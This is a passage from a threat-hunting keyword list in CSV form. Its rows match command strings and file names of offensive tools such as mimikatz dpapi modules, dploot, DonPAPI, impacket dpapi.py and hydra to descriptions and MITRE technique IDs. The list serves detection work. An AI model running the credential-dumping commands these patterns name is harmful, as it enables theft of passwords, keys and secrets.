T1558","N/A","N/A","N/A","Exploitation tools","https://github.com/samratashok/nishang","1","1","N/A","N/A","10","7851","2361","2023-09-05T07:54:08Z","2014-05-19T11:48:24Z" +"*DownloadFileImplant*","offensive_tool_keyword","koadic","Koadic. or COM Command & Control. is a Windows post-exploitation rootkit similar to other penetration testing tools such as Meterpreter and Powershell Empire. The major difference is that Koadic does most of its operations using Windows Script Host (a.k.a. JScript/VBScript). with compatibility in the core to support a default installation of Windows 2000 with no service packs (and potentially even versions of NT4) all the way through Windows 10.","T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1086 - T1105 - T1112 - T1204 - T1205 - T1218","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/offsecginger/koadic","1","1","N/A","10","10","199","62","2022-01-03T01:07:01Z","2022-01-03T01:05:43Z" +"*Downloading */*.tar to /tmp/*.pak*","offensive_tool_keyword","vRealizeLogInsightRCE","POC for VMSA-2023-0001 affecting VMware vRealize Log Insight which includes the following CVEs: VMware vRealize Log Insight Directory Traversal Vulnerability (CVE-2022-31706) VMware vRealize Log Insight broken access control Vulnerability (CVE-2022-31704) VMware vRealize Log Insight contains an Information Disclosure Vulnerability (CVE-2022-31711)","T1190 - T1071 - T1003 - T1069 - T1110 - T1222","TA0001 - TA0002 - TA0003 - TA0005 - TA0006 - TA0007","N/A","N/A","Exploitation Tools","https://github.com/horizon3ai/vRealizeLogInsightRCE","1","0","Added to cover the POC exploitation used in massive ransomware campagne that exploit public facing Vmware ESXI product ","N/A","2","147","24","2023-01-31T11:41:08Z","2023-01-30T22:01:08Z" +"*downloadMalwareDomains*","offensive_tool_keyword","domainhunter","Checks expired domains for categorization/reputation and Archive.org history to determine good candidates for phishing and C2 domain names ","T1583.002 - T1568.002","TA0011 - TA0009","N/A","N/A","Phishing","https://github.com/threatexpress/domainhunter","1","0","N/A","N/A","10","1380","291","2022-10-26T03:15:13Z","2017-03-01T11:16:26Z" +"*downloads/wapiti-code*","offensive_tool_keyword","wapiti","Web vulnerability scanner written in Python3","T1592 - T1592.003","TA0007 - TA0040","N/A","N/A","Web Attacks","https://github.com/wapiti-scanner/wapiti","1","0","N/A","N/A","8","785","132","2023-10-04T14:09:48Z","2020-06-06T20:17:55Z" +"*DownloadString*https://checkip.amazonaws.com*","offensive_tool_keyword","AlanFramework","Alan Framework is a post-exploitation framework useful during red-team activities.","T1055 - T1071 - T1060 - T1560 - T1021 - T1005 - T1018","TA0002 - TA0005 - TA0011 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/enkomio/AlanFramework","1","0","N/A","10","10","430","66","2022-08-23T18:20:33Z","2021-01-26T22:56:50Z" +"*-dP -eP -rS -cF -pS -tO -gW --httpx --dnsprobe -aI webanalyze -sS*","offensive_tool_keyword","Sudomy","Sudomy is a subdomain enumeration tool to collect subdomains and analyzing domains performing automated reconnaissance (recon) for bug hunting / pentesting","T1595 - T1046","TA0002","N/A","N/A","Reconnaissance","https://github.com/screetsec/Sudomy","1","0","N/A","N/A","10","1720","352","2023-09-19T08:38:55Z","2019-07-26T10:26:34Z" +"*dpapi.py backupkeys -t */*@*","greyware_tool_keyword","dpapi.py","the command is used to extract the Data Protection API (DPAPI) backup keys from a target system. DPAPI is a Windows API that provides data protection services to secure sensitive data. such as private keys. passwords. and other secrets. By obtaining the DPAPI backup keys. an attacker can potentially decrypt sensitive data stored on the target system or impersonate users. gaining unauthorized access to other systems and resources.","T1552.006","TA0009","N/A","N/A","Collection","N/A","1","0","greyware tool - risks of False positive !","N/A","N/A","N/A","N/A","N/A","N/A" +"*dpapi.py*","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","Operation Wocao","HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound","Lateral movement","https://github.com/SecureAuthCorp/impacket","1","0","N/A","10","10","11788","3290","2023-10-03T20:36:46Z","2015-04-15T14:04:07Z" +"*dpapi/decryptor.py*","offensive_tool_keyword","pypykatz","Mimikatz implementation in pure Python","T1003.002 - T1055 - T1078","TA0003 - TA0002 - TA0004","N/A","N/A","Credential Access","https://github.com/skelsec/pypykatz","1","1","N/A","N/A","10","2471","369","2023-05-30T16:14:22Z","2018-05-25T22:21:20Z" +"*dpapi::blob*","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","1","N/A","10","10","17801","3446","2023-08-03T09:01:21Z","2014-04-06T18:30:02Z" +"*dpapi::cache*","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","1","N/A","10","10","17801","3446","2023-08-03T09:01:21Z","2014-04-06T18:30:02Z" +"*dpapi::capi*","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","1","N/A","10","10","17801","3446","2023-08-03T09:01:21Z","2014-04-06T18:30:02Z" +"*dpapi::chrome*","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","1","N/A","10","10","17801","3446","2023-08-03T09:01:21Z","2014-04-06T18:30:02Z" +"*dpapi::cloudapkd*","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","1","N/A","10","10","17801","3446","2023-08-03T09:01:21Z","2014-04-06T18:30:02Z" +"*dpapi::cloudapreg*","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","1","N/A","10","10","17801","3446","2023-08-03T09:01:21Z","2014-04-06T18:30:02Z" +"*dpapi::cng*","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","1","N/A","10","10","17801","3446","2023-08-03T09:01:21Z","2014-04-06T18:30:02Z" +"*dpapi::create*","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","1","N/A","10","10","17801","3446","2023-08-03T09:01:21Z","2014-04-06T18:30:02Z" +"*dpapi::cred*","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","1","N/A","10","10","17801","3446","2023-08-03T09:01:21Z","2014-04-06T18:30:02Z" +"*dpapi::credhist*","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","1","N/A","10","10","17801","3446","2023-08-03T09:01:21Z","2014-04-06T18:30:02Z" +"*dpapi::luna*","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","1","N/A","10","10","17801","3446","2023-08-03T09:01:21Z","2014-04-06T18:30:02Z" +"*dpapi::masterkey*","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","1","N/A","10","10","17801","3446","2023-08-03T09:01:21Z","2014-04-06T18:30:02Z" +"*dpapi::protect*","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","1","N/A","10","10","17801","3446","2023-08-03T09:01:21Z","2014-04-06T18:30:02Z" +"*dpapi::ps*","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","1","N/A","10","10","17801","3446","2023-08-03T09:01:21Z","2014-04-06T18:30:02Z" +"*dpapi::rdg*","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","1","N/A","10","10","17801","3446","2023-08-03T09:01:21Z","2014-04-06T18:30:02Z" +"*dpapi::sccm*","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","1","N/A","10","10","17801","3446","2023-08-03T09:01:21Z","2014-04-06T18:30:02Z" +"*dpapi::ssh*","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","1","N/A","10","10","17801","3446","2023-08-03T09:01:21Z","2014-04-06T18:30:02Z" +"*dpapi::tpm*","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","1","N/A","10","10","17801","3446","2023-08-03T09:01:21Z","2014-04-06T18:30:02Z" +"*dpapi::vault*","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","1","N/A","10","10","17801","3446","2023-08-03T09:01:21Z","2014-04-06T18:30:02Z" +"*dpapi::wifi*","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","1","N/A","10","10","17801","3446","2023-08-03T09:01:21Z","2014-04-06T18:30:02Z" +"*dpapi::wwman*","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","1","N/A","10","10","17801","3446","2023-08-03T09:01:21Z","2014-04-06T18:30:02Z" +"*dpapi_dump*","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","N/A","Network Exploitation Tools","https://github.com/lefayjey/linWinPwn","1","1","N/A","N/A","10","1393","211","2023-10-03T13:10:13Z","2021-12-16T22:13:10Z" +"*dpapi_dump_*.txt*","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","N/A","Network Exploitation Tools","https://github.com/lefayjey/linWinPwn","1","1","N/A","N/A","10","1393","211","2023-10-03T13:10:13Z","2021-12-16T22:13:10Z" +"*dpapi_pick/credhist.py*","offensive_tool_keyword","donpapi","Dumping DPAPI credentials remotely","T1003.006 - T1021.001","TA0006 - TA0008","N/A","N/A","Credential Access","https://github.com/login-securite/DonPAPI","1","1","N/A","N/A","8","732","95","2023-10-03T05:27:06Z","2021-09-27T09:12:51Z" +"*DPAPImk2john.py*","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","10","8297","1937","2023-10-03T13:59:15Z","2011-12-16T19:43:47Z" +"*dpl4hydra *","offensive_tool_keyword","thc-hydra","Parallelized login cracker which supports numerous protocols to attack.","T1110.001","TA0006","N/A","N/A","Credential Access","https://github.com/vanhauser-thc/thc-hydra","1","0","N/A","N/A","10","8184","1825","2023-09-28T22:11:10Z","2014-04-24T14:45:37Z" +"*dpl4hydra.sh*","offensive_tool_keyword","thc-hydra","Parallelized login cracker which supports numerous protocols to attack.","T1110.001","TA0006","N/A","N/A","Credential Access","https://github.com/vanhauser-thc/thc-hydra","1","1","N/A","N/A","10","8184","1825","2023-09-28T22:11:10Z","2014-04-24T14:45:37Z" +"*dpl4hydra_*.csv*","offensive_tool_keyword","thc-hydra","Parallelized login cracker which supports numerous protocols to attack.","T1110.001","TA0006","N/A","N/A","Credential Access","https://github.com/vanhauser-thc/thc-hydra","1","1","N/A","N/A","10","8184","1825","2023-09-28T22:11:10Z","2014-04-24T14:45:37Z" +"*dpl4hydra_*.tmp*","offensive_tool_keyword","thc-hydra","Parallelized login cracker which supports numerous protocols to attack.","T1110.001","TA0006","N/A","N/A","Credential Access","https://github.com/vanhauser-thc/thc-hydra","1","1","N/A","N/A","10","8184","1825","2023-09-28T22:11:10Z","2014-04-24T14:45:37Z" +"*dpl4hydra_linksys*","offensive_tool_keyword","thc-hydra","Parallelized login cracker which supports numerous protocols to attack.","T1110.001","TA0006","N/A","N/A","Credential Access","https://github.com/vanhauser-thc/thc-hydra","1","1","N/A","N/A","10","8184","1825","2023-09-28T22:11:10Z","2014-04-24T14:45:37Z" +"*dploot -*","offensive_tool_keyword","dploot","DPAPI looting remotely in Python","T1003.006 - T1027 - T1110.004","TA0006 - TA0007 - TA0010","N/A","N/A","Credential Access","https://github.com/zblurx/dploot","1","0","N/A","10","3","279","23","2023-09-30T11:10:26Z","2022-05-24T11:05:21Z" +"*dploot*backupkey*","offensive_tool_keyword","dploot","DPAPI looting remotely in Python","T1003.006 - T1027 - T1110.004","TA0006 - TA0007 - TA0010","N/A","N/A","Credential Access","https://github.com/zblurx/dploot","1","1","N/A","10","3","279","23","2023-09-30T11:10:26Z","2022-05-24T11:05:21Z" +"*dploot*browser*","offensive_tool_keyword","dploot","DPAPI looting remotely in Python","T1003.006 - T1027 - T1110.004","TA0006 - TA0007 - TA0010","N/A","N/A","Credential Access","https://github.com/zblurx/dploot","1","1","N/A","10","3","279","23","2023-09-30T11:10:26Z","2022-05-24T11:05:21Z" +"*dploot*certificates*","offensive_tool_keyword","dploot","DPAPI looting remotely in Python","T1003.006 - T1027 - T1110.004","TA0006 - TA0007 - TA0010","N/A","N/A","Credential Access","https://github.com/zblurx/dploot","1","1","N/A","10","3","279","23","2023-09-30T11:10:26Z","2022-05-24T11:05:21Z" +"*dploot*credentials*","offensive_tool_keyword","dploot","DPAPI looting remotely in Python","T1003.006 - T1027 - T1110.004","TA0006 - TA0007 - TA0010","N/A","N/A","Credential Access","https://github.com/zblurx/dploot","1","1","N/A","10","3","279","23","2023-09-30T11:10:26Z","2022-05-24T11:05:21Z" +"*dploot*machinecertificates*","offensive_tool_keyword","dploot","DPAPI looting remotely in Python","T1003.006 - T1027 - T1110.004","TA0006 - TA0007 - TA0010","N/A","N/A","Credential Access","https://github.com/zblurx/dploot","1","1","N/A","10","3","279","23","2023-09-30T11:10:26Z","2022-05-24T11:05:21Z" +"*dploot*machinecredentials*","offensive_tool_keyword","dploot","DPAPI looting remotely in Python","T1003.006 - T1027 - T1110.004","TA0006 - TA0007 - TA0010","N/A","N/A","Credential Access","https://github.com/zblurx/dploot","1","1","N/A","10","3","279","23","2023-09-30T11:10:26Z","2022-05-24T11:05:21Z" +"*dploot*machinemasterkeys*","offensive_tool_keyword","dploot","DPAPI looting remotely in Python","T1003.006 - T1027 - T1110.004","TA0006 - TA0007 - TA0010","N/A","N/A","Credential Access","https://github.com/zblurx/dploot","1","1","N/A","10","3","279","23","2023-09-30T11:10:26Z","2022-05-24T11:05:21Z" +"*dploot*machinevaults*","offensive_tool_keyword","dploot","DPAPI looting remotely in Python","T1003.006 - T1027 - T1110.004","TA0006 - TA0007 - TA0010","N/A","N/A","Credential Access","https://github.com/zblurx/dploot","1","1","N/A","10","3","279","23","2023-09-30T11:10:26Z","2022-05-24T11:05:21Z" +"*dploot*masterkeys*","offensive_tool_keyword","dploot","DPAPI looting remotely in Python","T1003.006 - T1027 - T1110.004","TA0006 - TA0007 - TA0010","N/A","N/A","Credential Access","https://github.com/zblurx/dploot","1","1","N/A","10","3","279","23","2023-09-30T11:10:26Z","2022-05-24T11:05:21Z" +"*dploot*vaults*","offensive_tool_keyword","dploot","DPAPI looting remotely in Python","T1003.006 - T1027 - T1110.004","TA0006 - TA0007 - TA0010","N/A","N/A","Credential Access","https://github.com/zblurx/dploot","1","1","N/A","10","3","279","23","2023-09-30T11:10:26Z","2022-05-24T11:05:21Z" +"*dploot*wifi*","offensive_tool_keyword","dploot","DPAPI looting remotely in Python","T1003.006 - T1027 - T1110.004","TA0006 - TA0007 - TA0010","N/A","N/A","Credential Access","https://github.com/zblurx/dploot","1","1","N/A","10","3","279","23","2023-09-30T11:10:26Z","2022-05-24T11:05:21Z" +"*dploot_linux_adm64*","offensive_tool_keyword","dploot","DPAPI looting remotely in Python","T1003.006 - T1027 - T1110.004","TA0006 - TA0007 - TA0010","N/A","N/A","Credential Access","https://github.com/zblurx/dploot","1","1","N/A","10","3","279","23","2023-09-30T11:10:26Z","2022-05-24T11:05:21Z" +"*dploot-main.zip*","offensive_tool_keyword","dploot","DPAPI looting remotely in Python","T1003.006 - T1027 - T1110.004","TA0006 - TA0007 - TA0010","N/A","N/A","Credential Access","https://github.com/zblurx/dploot","1","1","N/A","10","3","279","23","2023-09-30T11:10:26Z","2022-05-24T11:05:21Z" +"*dpplabbmogkhghncfbfdeeokoefdjegm*","greyware_tool_keyword","Proxy SwitchySharp","External VPN usage within coporate network","T1090.003 - T1133 - T1572","TA0003 - TA0001 - TA0011 - TA0010 - TA0005","N/A","N/A","Data Exfiltration","https://raw.githubusercontent.com/SigmaHQ/sigma/43277f26fc1c81fc98fc79147b711189e901b757/rules/windows/registry/registry_set/registry_set_chrome_extension.yml","1","0","detection in registry","8","10","N/A","N/A","N/A","N/A" +"*dr0op/CrossNet*","offensive_tool_keyword","cobaltstrike","Cobaltstrike payload generator","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - 